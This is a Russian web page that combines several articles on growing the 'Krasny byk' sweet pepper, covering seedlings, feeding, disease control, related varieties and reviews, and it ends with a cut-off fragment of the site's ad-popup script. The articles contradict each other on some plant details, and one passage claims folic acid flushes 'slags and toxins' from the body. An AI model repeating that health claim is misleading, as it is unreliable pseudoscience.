3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание сорта перцев бык

Перец Красный бык

Тем, кто желает на своем участке выращивать вкусный, крупный болгарский перец, следует обратить внимание на сорт «Красный бык». Этот крупноплодный гибрид отличается превосходным вкусом мякоти, сочностью, высокой урожайностью и прочими достоинствами. Выращивают перец «Красный бык» в средней и южной полосе России на открытых грунтах и в парниках, теплицах. Для сорта присущи общие правила и некоторые особенности культивирования, о которых можно узнать в приведенной статье.

Описание

Отличительной чертой гибрида является плод огромного размера. Его длина составляет примерно 20 см, усредненная масса 200-250 г. Однако в некоторых случаях вес перцев достигает 400 г. Форма овоща удлиненно цилиндрическая. Его окраска до наступления технического созревания – зеленая, по достижению спелости – ярко-красная. Стенки перца толстые, до 10 мм. Внутренняя полость имеет 3-4 камеры с небольшим количеством семян. Поверхность плода глянцевая, покрыта тонкой, нежной кожицей. Увидеть фото перца «Красный бык» можно на фото ниже.

Вкусовые характеристики сорта «Красный бык» превосходные: мякоть сочная, сладкая, ароматная, в меру плотная. В микроэлементный состав перца входит большое количество витаминов группы В, С, Р, РР, а также комплекс минеральных солей, что делает овощ не только очень вкусным, но и полезным.

Потребляют перец в свежем, консервированном виде, в составе кулинарных блюд. Зачастую овощ включают в меню диетического питания. Он рекомендован людям, страдающим сахарным диабетом, заболеваниями желудочно-кишечной системы, гипертонией и некоторыми иными недугами.

Особенности агротехники

Сорт перца «Красный бык F1» выращивают рассадным методом. Семена на рассаду рекомендовано высевать в марте. Предварительно их следует прорастить, поместив во влажную среду (мокрую ткань, марлю) с температурой +25-+27 0 С. Семена проклевываются через 5-10 суток, после чего их высевают. Грунт для выращивания рассады должен быть рыхлым, питательным. Для его создания можно смешать огородную землю с торфом, перегноем, опилками. При необходимости готовый почвенный состав можно приобрести в специализированном магазине. В качестве емкостей для культивирования растений могут выступать небольшие пластиковые либо торфяные горшочки.

После появления всходов, перцы следует поместить в менее теплую среду с температурой + 22-23 0 С. При этом рассада требовательна не только к температурному, но и световому режиму. Поэтому опытные огородники «подсвечивают» молодые растения лампами дневного света. Оптимальная продолжительность светового периода составляет 12 часов в сутки.

Полив молодых растений следует осуществлять регулярно, по мере высыхания грунта. Подкормку рекомендовано проводить каждые 2 недели. В качестве удобрения можно использовать специальные комплексные составы, содержащие азот и калий.

Выращивать перцы сорта «Красный бык» можно в открытом и защищенном грунте. При этом использование парника либо теплицы позволяет ускорить процесс плодоношения и увеличить урожайность культуры. Пикировать перцы в парник можно в начале мая, для открытого грунта лучшим временем для высаживания растений является начало июня. Возраст рассады на момент пикировки должен составлять 45-55 суток.

Кусты гибрида «Красный бык» сильнорослые, раскидистые. Их высота достигает 1 м. Поэтому, как только молодые растения прижились, их необходимо начать формировать, прищипнув макушку верхнего побега. В процессе роста на кусте удаляют мелкие пасынки, оставляя 5-6 основных плодоносящих ветвей.

Почву по периметру ствола следует периодически пропалывать и рыхлить. При этом обязательно нужно помнить, что корни перцев расположены в верхнем слое грунта на глубине 5 см от поверхности земли. Именно поэтому глубокого рыхления, которое может повредить корни, следует избегать. Мульчирование рыхлой почвы поможет предотвратить активный рост сорных трав и чрезмерное пересыхание грунта.

Массовое созревание перцев сорта «Красный бык» начинается через 110-125 суток от дня высевания семени на рассаду. При этом первые перцы можно попробовать на несколько недель раньше.

На каждом растении сорта «Красный бык» в период активного плодоношения может образовываться от 20 до 30 крупных перцев одновременно, поэтому куст необходимо обязательно подвязывать. Для этого можно использовать шпалеру.

Многочисленные положительные отзывы перец «Красный бык» получает от опытных земледельцев, которые почитают этот сорт не только из-за превосходного вкуса крупных плодов, но и высокой урожайности. Так в условиях открытого грунта с 1 м 2 можно получить 7-9 кг овощей. При выращивании в условиях парника либо теплицы этот показатель может быть увеличен до 12-15 кг/м 2 . Фото перца «Красный бык» и отзывы о нем можно видеть в приведенной статье.

Отзывы

Гибрид любим многими огородниками. Они же зачастую обмениваются опытом и отзывами о перце «Красный бык», выкладывают фото своего успешно выращенного урожая и снимают видео, на котором отображен процесс выращивания. Так, видеть реальный урожай перцев и услышать отзывы о нем «из первых уст» земледельца можно на видео:

Перец сорта «Красный бык» заслуживает особого внимания опытных земледельцев и начинающих огородников. Он дает возможность каждому из них получить богатый урожай вкусных, крупных перцев без особых усилий и специальных знаний. Урожай красных овощей этого гибрида станет не только вкусной пищей, но и натуральным источником витаминов и минералов. Высокая урожайность сорта позволяет лакомиться свежим овощем на протяжении всего лета и в зимний период в консервированном виде.

Перец сладкий Красный бык: фото, особенности сорта, отзывы

Сладкий перец Красный бык − раннеспелый культивар, который является достижением агрофирмы Гавриш. В Госреестр по РФ сорт внесен в 2001 году. Одноименный гибридный перец выпускает семеноводческая компания Русский огород с пометкой F1 НК. В статье представлены характеристика и описание сорта, не имеющий ничего общего с гибридом.

Описание и характеристика сорта

Красный бык вступает в плодоношение после появления всходов спустя 95 суток. Относится к высокоурожайным сортам. Предназначен для культивирования в теплицах, под временными пленочными укрытиями и на незащищенных грядках.

Растение высокорослое. Мощные кусты заканчивают свой рост на отметке 1,5 м. В открытом грунте стебли чаще всего не достигают такой высоты, они значительно ниже.

На кусте формируются темно-зеленые плоды кубической формы, которые при созревании приобретают ярко красный окрас (см. фото).

Перцы крупные и мясистые, в среднем весят 200-250 гр. При формировании и нормировании плоды могут достигать 400 гр. Толщина околоплодника в среднем составляет 8 мм.

Красный бык подходит для всех видов переработок в кулинарии. Благодаря сочности, перечному аромату и характерной сладости очень хорош для потребления в свежем виде и в салатах.

Урожайность культивара во многом зависит от условий выращивания, при правильной агротехнике может доходить до 10 кг с кв. м. Период плодоношения сорта − с начала июля по конец сентября.

Агрофирмой Гавриш также выпускаются семена перца Оранжевый бык. Этот сорт более поздний, растение среднорослое, плоды идентичны по форме красной разновидности, но имеют соответствующий названию окрас.

Особенности выращивания и ухода

Семена на рассаду высевают в средней полосе в конце февраля или начале марта. Пикируют сеянцы при появлении 1 или 2 настоящих листочков.

На постоянное место высаживают с середины мая, при возвратных заморозках пересадка может затянуться до начала июня.

Рекомендованная схема размещения культуры оригинатором − 60 см между рядами и 40 см расстояние между кустами.

Из-за высокорослости Красный бык требует подвязки к опорам. Среди особенностей ухода нужно выделить необходимость удаления пасынков (боковых побегов) до первой развилки на кусте.

Перец очень любит воду, поэтому грунт увлажняют каждые 2-4 дня (в зависимости от погодных условий). В период наливания плодов количество поливов сокращают, чтобы перцы не растрескивались.

Перец нужно обязательно подкармливать, рыхлить почву вокруг кустов и регулярно пропалывать. Сократить частоту поливов, избавиться от прополок и рыхления поможет мульчирование грунта.

Болезни и вредители

Перец сладкий Красный бык имеет хороший иммунитет на генетическом уровне по отношению к основным заболеваниям, свойственным пасленовым культурам.

Несмотря на устойчивость к болезням, требуется проведение профилактических мер, среди которых соблюдение севооборота, своевременные поливы, проветривание теплиц и осмотр листьев на предмет наличия вредителей.

Чтобы кусты не атаковали вредоносные насекомые, рядом с перцем высаживают растения-репелленты. К ним относятся календула, пижма и др.

Достоинства и недостатки

В отзывах о перце Красный бык овощеводы отмечают следующие достоинства сорта:

  • ранняя отдача урожая;
  • выраженный вкус сладкого перца;
  • красивые и крупные плоды;
  • высокая урожайность с кв. м.;
  • устойчивость к болезням.

Минусы культуры − высокорослость растения, требующая обязательной подвязки кустов.

Похожие сорта

По характеристике и описанию сорт Красный бык имеет сходства с перцами:

  • Красная шапочка;
  • Биг бой;
  • Красный бок;
  • Толстячок;
  • Красный куб.

Сорт Красная шапочка имеет плоды аналогичной формы, что и у Быка. Перцы очень мясистые, в среднем весят 200 гр., максимально могут набирать массу до 250 гр. Культура среднеранняя, отдает первые плоды после массовой всхожести через 110 или 120 суток. Особенность культивара − неприхотливость к освещению и адаптация к дневным и ночным скачкам температуры. Растение также отличается обильным плодоношением. За сезон с кв. м. собирают в среднем 10 кг. урожая. Культура мало подвержена болезням, имеет низкорослый куст, неприхотлива при выращивании, за счет чего полюбилась овощеводам.

Биг бой − один из лучших раннеспелых сортов (105-115 дней) с крупными плодами кубовидной формы и высокими показателями урожайности. В стадии биологической спелости перцы красные, весят до 300 гр. каждый. Стенки мясистые, толщина перикарпия доходит до 8 мм. В условиях теплицы куст вырастает более метра, поэтому требует фиксации к опорам. Урожайность с кв. м. при хорошем уходе и культивировании в теплице может составлять до 8 кг.

Красный бок − еще один популярный сорт от компании Гавриш. Кубовидные плоды достаточно крупные и толстостенные, вес одного экземпляра доходит до 300 гр., а стенка перикарпия в среднем имеет толщину 7 мм. Растение формирует куст высотой до 1,5 м. Генетически устойчив к комплексу болезней. Сорт во многом имеет сходства с перцем Красный бык.

Толстячок созревает позднее, чем выше описанные культивары. В плодоношение вступает не ранее 120-130 дней после проклевывания ростков. Растение формируется невысокое (до 55 см), полураскидистое, не требует формирования и подвязок. Одновременно завязывает до 12 плодов кубической формы. Перцы очень мясистые, сочные, вкусные и ароматные, имеют хорошую лежкость.

Красный куб − селекционное достижение семеноводческой компании Гавриш. Культура среднеспелая (120 дней). Слегка ребристые кубовидные плоды насыщенно красного цвета весят не более 200 гр. Отличаются хорошей толщиной перикарпия (9 мм). Куст мощный и раскидистый, до 0,7 м в высоту. Перец устойчив к вирусу табачной мозаики.

Отзывы огородников

«Мне нравятся крупноплодные сорта сладких перцев. Они мясистые и сочные, идеальны для салатов. Красного быка в этом году высаживала первый раз. Эти перчики понравились за раннеспелость и дружное появление завязей. С каждого куста уже в середине июля сняла по 4 плода в бланжевой спелости. Растения нужно обязательно подвязывать, у меня в теплице вымахали больше метра. За сезон несколько раз подкармливала кусты, удаляла нижние пасынки. Урожай получился отменным, с кв. метра собрала где-то 8 кг».

«Красный бык − не самый мой любимый сорт в плане урожайности. Плодов не очень много, зато крупные. Этим мне и приглянулся. Вкус у перца неплохой, выращиваю всего несколько кустов для первых салатов из собственных овощей».

«Не очень приветствую высокорослые перцы, но Красный бык мне нравится. Он неприхотливый, хорошо плодоносит, имеет отличный вкус. Вес одного, самого крупного перца доходил до 350 гр. Овощи хорошо дозаривают в условиях дома. Единственное, что не нравится в этом сорте, так это подвязка и обязательное обрывание нижних побегов, муторно все это для меня. Из-за этого сажаю всего 5-6 кустиков «.

Красный бык набирает популярность среди огородников. Он один из самых первых приносит урожай среди ранних сортов перца, формирует красивые, крупные плоды и не подвергается болезням пасленовых. Однако из-за высокорослости многие овощеводы отдают предпочтение его «собрату» − Желтому быку. Последний чуть позже вступает в плодоношение, но формирует не высокие кусты, более удобные в уходе.

Описание сорта перцев Бык

Из гибридных разновидностей хорошо зарекомендовал себя сорт перца Бык. Рассмотрим описание сорта более подробно.

Разновидности сорта

Перец сорта Бык бывает черным, желтым, оранжевым и красным .

Все разновидности обладают отменными вкусовыми характеристиками, толстыми стенками, сочностью и крупными размерами. Их главная особенность заключается в том, что завязи формируются даже при минимальном освещении. Выращивание культуры происходит рассадным методом.

Характеристика Красного вида

Перец Красный Бык имеет отличительные черты.

  • полностью созревает за 100 дней;
  • имеют детерминантный куст (170 см в высоту) , темно-зеленую листву среднего размера;
  • обладают крупными плодами: вес сформированного способен достигать отметки в 250 г, длина созревшего овоща — 21 см. Перец «Красный Бык» характеризуется диаметром плода в 6 см.
  • имеют конусную форму с вытянутым носиком на конце. Внутренняя его часть содержит 4 отсека, для хранения семян. Стенки плода плотные и толстые. Средняя ширина стенки — 0,7 см.

Как только плод полностью сформировался и набрал нужную массу, его собирают. С наступлением технической спелости цвет плода становится зеленым, после сбора урожая сорт перца Красный Бык краснеет всего за несколько дней. В среднем сроки наступления красноты — 3-5 дней. Вкус плодов приятный, с нотками сладости.

Характеристика Оранжевого вида

Сладкий перец Оранжевый Бык относится к гибридным разновидностям. В большинстве регионов страны его выращивают в условиях теплицы. В южных районах возможно выращивание в открытом грунте.

  • Урожайность сорта довольно высокая: с 1 кв. м огородники собирают около 10 кг крупных перцев.
  • Высота куста, согласно описанию, не превышает 1 м. Листья зеленого цвета, с частыми прожилками.
  • Средняя масса сформированного плода составляет 200 г. Форма плода кубовидная. Толщина стенки — около 10 мм.

Во время полного созревания плоды приобретают оранжевый оттенок. Вкус насыщенный, сладкий и приятный. Перец Оранжевый Бык используют для приготовления салатов или консервации.

Особенности посадки и ухода не отличаются от условий, предусмотренных для красной разновидности сорта. Единственное дополнение — необходимость вовремя собирать урожай, чтобы от большого количества крупных и тяжелых плодов не повреждался куст.

Характеристика Желтого вида

  • Желтый сорт характеризуется габаритными плодами массой до 400 г. Когда плод находится в фазе полного созревания, он приобретает желтый оттенок. Формирование завязей и плодов происходит до тех пор, пока не наступят заморозки.
  • Согласно характеристике, куст достигает высоты в 130 см, обладает раскидистостью.

Желтые плоды универсальны в использовании. Ухаживать за растением и проводить посадку рассады следует по тому же принципу, что и другие виды сорта: они нуждаются в аналогичном количестве подкормок, условиях полива и выращивания.

Особенности посадки

Перец сорта Бык следует выращивать рассадным методом. Высаживание семян, для получения рассады проводят в начальных числах марта (если выращивание плодов будет происходить в открытом грунте). Если цель — выращивать культуру в теплице, высаживать семена можно в начале февраля. Заранее семена обрабатывают раствором марганца или алоэ, чтобы обеззаразить от бактерий и повысить их всхожесть.

У сорта высокий уровень чувствительности к кислотно-щелочному балансу грунта. Чтобы нормализовать уровень кислотности и солей в почве, нужно заранее в нее внести небольшое количество извести. Оптимальный уровень — 15 г на 1,5 кг земли.

Пикировка

Если семена не были высажены в отдельные контейнеры, через 40 дней проводят пикировку. Во время этой процедуры в корневую систему вносят вещество, ускоряющее рост. Это делают, чтобы кусты быстрее развивались и набирались необходимой высоты.

Закалка

Также нужно ежедневно проводить мероприятия по закалке: каждый день выносить рассаду на открытый воздух всего на несколько часов. Это позволит рассаде устоять перед стрессовыми ситуациями и не даст ей погибнуть от резких изменений температуры воздуха.

Высадка на постоянное место

На постоянное место выращивания перец сорта Бык пересаживают в начале мая. При посадке придерживаются схемы 50 х 50 см. После посадки сразу избавляются от боковых побегов и удаляют все нижние листья. Это делают, чтобы куст равномерно развивался.

Подвязка

У сорта тяжелые плоды и высокие кусты, потому их важно подвязывать. Для этого используют специальные опоры и шпалеры. Нельзя допускать обламывания стеблей, иначе существенно снизится урожайность.

Правила ухода

Полив проводят утром и только теплой водой. Это позволяет сохранить правильное развитие куста и корневой системы, ведь холодная вода может привести к гниению корневой системы. Солнечные лучи в совокупности с влагой создают вокруг сухую пленку на почве и позволяют кислороду проникать внутрь почвы.

Подкормка

Чтобы урожайность была высокой, следует вовремя проводить подкормки. За вегетационный период удобряют трижды. Каждая подкормка подразумевает использование определенного раствора, но общее в них одно: в каждый куст необходимо лить не менее 1 л.

  • Первую подкормку проводят через 14 дней после высаживания рассады на постоянное место. Для приготовления раствора в 10 л теплой разводят 2 ст. л. суперфосфата.
  • Вторую подкормку проводят, когда начинают формироваться цветки. Для приготовления раствора понадобится 10 л воды, 2 ст. л. карбамида и 2 ст. л. калиевого фосфата.
  • Третью подкормку проводят во время формирования плода. В 10 л теплой воды разводят 3 ст. л. калиевой соли, в каждый куст вливают по 1,5 л приготовленной жидкости.

Болезни и паразиты

Эта разновидность перцев обладает высокими показателями устойчивости к табачной мозаике и фитофторе.

В качестве профилактики следует лишь регулярно осматривать кусты на наличие различных симптомов, чтобы вовремя обнаружить какие-либо проблемы с урожаем.

Сочный и урожайный перец «Красный бык» для выращивания необычайно вкусных плодов на своем участке

Болгарский перец — это ценный источник витаминов и минералов. Овощ содержит клетчатку, фолиевую кислоту, кальций, йод, железо и много других полезных компонентов. Чтобы не искать на полках магазинов вкусные и качественные перчики, огородники предпочитают выращивать их самостоятельно на своем участке.

При выборе сортов обращают внимание на вкусовые и товарные качества, требовательность к уходу, устойчивость растений перед непогодой. Один из лидеров — гибрид Красный бык. Рассмотрим его отличительные черты.

Описание перца

Гибрид Красный бык f1 соединил в себе все лучшее: крупные плоды, глянцевую поверхность, мясистую мякоть и универсальность в применении. Выращивают овощ преимущественно на юге и в средней полосе России.

Отличительные черты

Кусты высокорослые, в высоту достигают 1,5 м. Листья средней величины, окрас светло-зеленый. Гибрид среднеранний, созревает за 90–100 дней с момента посадки.

При выращивании в открытом грунте используют рассадный способ. Красный бык имеет высокий иммунитет к распространенным заболеваниям культуры и насекомым-вредителям.

Характеристика плодов и урожайность

Плоды крупные, вес одного варьируется от 200 до 400 г. Окрас насыщенно-красный, поверхность гладкая. Стенки плотные, средняя толщина — 9 мм, из-за чего урожай способен храниться 2-3 месяца без потери вкусовых качеств.

С 1 м2 собирают до 9 кг сладкого перца. Мякоть хрустящая и сочная, умеренно сладкая. Содержит много витаминов, широко используется в кулинарии для приготовления овощных салатов, гарниров и заготовок на зиму.

Интересно! Фолиевая кислота, содержащаяся в мякоти сладкого перца, выводит из организма шлаки и токсины. Витамины группы В служат эффективной профилактикой спадов настроения и бессонницы.

Подготовка в выращиванию

Выращивают перец на супесчаных грядках с низким уровнем кислотности. Лучшие предшественники — зелень, бобовые или лук. Не рекомендуется высаживать гибрид после картофеля или томатов.

В конце октября грядки перекапывают, вносят слой торфа и компоста. С приходом весны перекапывают повторно, разбивают все крупные комки, чистят от листвы, мусора и сорняков. Поверхность почвы должна быть ровная, с четкими междурядьями. Рекомендуемая схема посадки — 70х70. Загущенность снижает урожайность и способствует развитию опасных бактерий. Чтобы понизить кислотность почвы, грунт посыпают смесью сухой древесной золы и извести. Процедуру проводят перед посадкой семян.

Приобретают посадочный материал только в проверенных магазинах. Важно, чтобы упаковка была целая и не истек срок годности. Семена осматривают на наличие внешних дефектов, экземпляры с повреждениями удаляют. Оставшиеся семечки дезинфицируют с помощью борной кислоты или бордоской жидкости. После посевной материал проращивают: помещают во влажную тряпочку и убирают на солнечный подоконник. Это укрепляет иммунитет будущих растений и ускоряет всхожесть.

Интересно! Эффективен и метод проращивания семян в песке. Обеззараженные семена перемешивают с влажным песком в пропорции 1:4. Смесь перекладывают в небольшие емкости и убирают в теплое место. После того как семена проклюнутся, их пересаживают в емкость для рассады вместе в песком.

Выращивание рассады

Выращивать рассаду рекомендуется в торфяных таблетках или горшочках. Такие емкости недорого стоят и продаются в любом магазине для огородников. Торфяные таблетки удерживают влагу, легки в использовании. Если возможности приобрести емкости нет, используют картонные пакеты из-под молока, цветочные горшки, пластиковые стаканчики. Главное — предварительно помыть тару и протереть чистым полотенцем.

В качестве почвы берут землю с огорода, перемешанную с покупным грунтом. Для надежности состав дезинфицируют с помощью раствора марганцовки, чтобы убить опасные бактерии и возбудители болезней. Рекомендуется добавить речной песок или древесные опилки.

Природные компоненты служат отличным разрыхлителем и удерживают влагу в почве. Перед посадкой семян грунт насыпают в емкость и обильно поливают. Далее делают небольшие ямки на расстоянии около 2 см друг от друга. В каждую помещают семя, присыпают сверху землей. Держат рассаду в теплом месте.

Почва всегда должна быть чуть влажной, пересыхание недопустимо. Для полива используют пипетку, чтобы вода попадала прямо под основание стебля. Когда появятся первые листочки, вносят жидкие органические удобрения, например, куриный помет или раствор на основе древесной золы. При недостатке света и тепла перцы ставят под люминесцентные лампы, чтобы ускорить развитие. Перед посадкой в огород рассаду обильно поливают.

Важно! При стремительном росте организуют пикировку. Процедура необходима, чтобы обеспечить здоровое развитие корневой системы. Со временем корни становятся больше, им требуется более просторная емкость. Саженцы аккуратно вынимают и пересаживают в другую тару с новым обеззараженным грунтом. При пикировке рекомендуется действовать осторожно, без спешки, чтобы не повредить еще хрупкие стебли и листочки.

Посадка

Высаживают рассаду перца на заранее подготовленные грядки в безветренное и пасмурное утро. Саженцы аккуратно вынимают из емкости, оставляя на корнях комок мокрой земли, помещают в ямки на грядке, присыпают и прихлопывают ладонью.

Рекомендуется в первую неделю накрыть каждое растение полиэтиленовым мешком или пленкой. Это защитит ростки от дождей, ветров и возможных заморозков. В дальнейшем гибрид нуждается в подвязке, поэтому возле каждого куста заранее устанавливают деревянный колышек.

Дальнейший уход

Основа любого ухода — своевременный и регулярный полив. Увлажняют гибрид 1 раз в 5-6 дней, на 1 кустик уходит около 1,5 л воды. Если лето жаркое и дождливое, количество поливов сокращают. Перед процедурой грядки рыхлят, чтобы улучшить качество почвы и задержать влагу в земле. Оптимальная глубина рыхления — 10–15 см.

Подкармливают растение 3-4 раза за период созревания. Первую подкормку организуют через 2 недели после высадки на участок. В качестве удобрений используют навозную жижу, древесную золу, суперфосфат, аммиачную селитру.

Рекомендуется чередовать минеральные и органические удобрения. Также не обойтись без внекорневых подкормок. Для укрепления иммунитета растения опрыскивают раствором молочной сыворотки или бордоской жидкостью.

Особенности выращивания и возможные трудности

Высокорослое растение нуждается в обязательной подвязке. Стебли у перца очень хрупкие, поэтому могут сломаться под тяжестью созревших плодов. Чтобы не допустить этого, каждую скелетную ветвь подвязывают к опоре отдельно. Важно перед процедурой протереть колышки обеззараживающим раствором.

Получить богатый урожай невозможно и без формирования куста. Слишком длинные побеги и ветви укорачивают садовыми ножницами, а верхушку прищипывают. Если этого не сделать, плодов будет много, не всем не хватит сил для развития, и перчики останутся маленькими.

При выращивании овоща в теплице соблюдают ряд важных правил:

  1. Регулярно проветривают сооружение, открывают двери и форточки.
  2. Поливают кустики строго под корень, расходуя на каждый по 1-2 л воды.
  3. Окучивают и рыхлят междурядья, чтобы предотвратить появление насекомых.
  4. В период цветения кустики встряхивают, чтобы активизировать опыление.

Характерные болезни и вредители

Болезни появляются из-за несоблюдения правил севооборота, неправильного ухода, зараженной земли. Чтобы предотвратить появление заболеваний, рекомендуется соблюдать режим полива и подкормок, использовать проверенных производителей семян.

Каким болезням подвержен перец Красный бык:

  1. Корневая гниль поражает кусты еще на стадии развития рассады. При этом на корнях появляется белый налет. Для лечения используют препарат «Топаз» или «Квадрис».
  2. Мучнистая роса проявляется в виде белого надета на листьях и стебле. Если вовремя не предпринять меры, плоды деформируются, теряют упругость. Для борьбы с болезнью используют раствор медного купороса или древесную золу.
  3. Табачная мозаика возникает из-за зараженной почвы и жаркого лета. Листья покрываются желто-коричневым узором. Для лечения используют препарат «Кемира» или опрыскивание средством «ХОМ».

Из вредителей отмечают проволочников, слизней, белокрылок и колорадских жуков. Отличное профилактическое средство от них — регулярная прополка грядок и удаление сорняков.

Рекомендуем периодически осматривать кустики на наличие вредителей. Чтобы избавиться от насекомых, используют профессиональные средства: «Тайфун», «Вектра», «Максим».

Преимущества и недостатки сорта

У гибрида Красный бык отличный иммунитет перед холодной и дождливой погодой. Также отмечают следующие преимущества:

  • высокая урожайность;
  • сладкая и мясистая мякоть;
  • возможность выращивать как в открытом грунте, так и в теплице;
  • устойчивость перед болезнями и вредителями.

Из недостатков отмечают необходимость в подвязке и формировании куста. Многие гибриды не нуждаются в этих процедурах.

Схожие виды

У Красного быка есть «братья» — перцы Желтый бык и Оранжевый бык. Среднеранний Желтый бык — это гибрид с крупными перчиками насыщенного желтого окраса. Форма усеченная, слегка вытянутая. Масса плода варьируется от 200 до 300 г, средняя длина — 20 см. Мякоть сочная и толстая, кожица тонкая. Выращивают овощ в теплых регионах страны.

Оранжевый бык имеет оранжево-коричневый окрас. Созревает за 100–110 дней. Вкус сочный, без горечи. Кожура плотная, поэтому урожай способен храниться 2-3 месяца без потери вкусовых и товарных качеств. Отлично подходит для приготовления блюд и употребления в свежем виде.

Важно! Агротехника выращивания у всех перцев одинаковая. Главное — вовремя поливать и удобрять грядки, рыхлить грунт и удалять сорняки.

Отзывы

Одни огородники высаживают на своем участке только гибрид Красный бык, другие предпочитают менее прихотливые в уходе сорта. Изучим несколько отзывов опытных дачников.

Ольга, г. Саратов: «Перец Красный бык — это отличный гибрид. Мне он нравится из-за сочности и сладости. Использую для приготовления зимних заготовок. Блюда получаются аппетитными и полезными!»

Ирина, г. Уфа: «Высаживаю гибрид только в теплицу. Поливаю ранним утром, чтобы не было солнечных ожогов. Удобряю суперфосфатом и золой. Урожайность хорошая, с одного куста собираю до 3 кг».

Михаил, г. Москва: «Гибрид Красный бык в прошлом году заболел мучнистой росой. Вылечить удалось, однако 80% урожая погибло. Больше высаживать его не буду, пробую более устойчивые к заболеваниям овощи».

Заключение

Высокоурожайный перец Красный бык назван так неслучайно: насыщенные алые плоды вырастают крупными и тяжелыми. Высокорослые кусты из-за этого нуждаются в своевременной подвязке, которую обеспечивает заранее подготовленная опора.

Высаживают овощ на светлых и солнечных участках. Лучшие предшественники — бобовые или зелень. Поливают по мере высыхания земли, на один кустик расходуют около 1,5 л воды. Собирают в середине августа, срывают перчики вместе с плодоножкой. Благодаря плотной кожуре урожай долго хранится. В применении перец универсален, подходит для закусок, запеканок, салатов и супов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
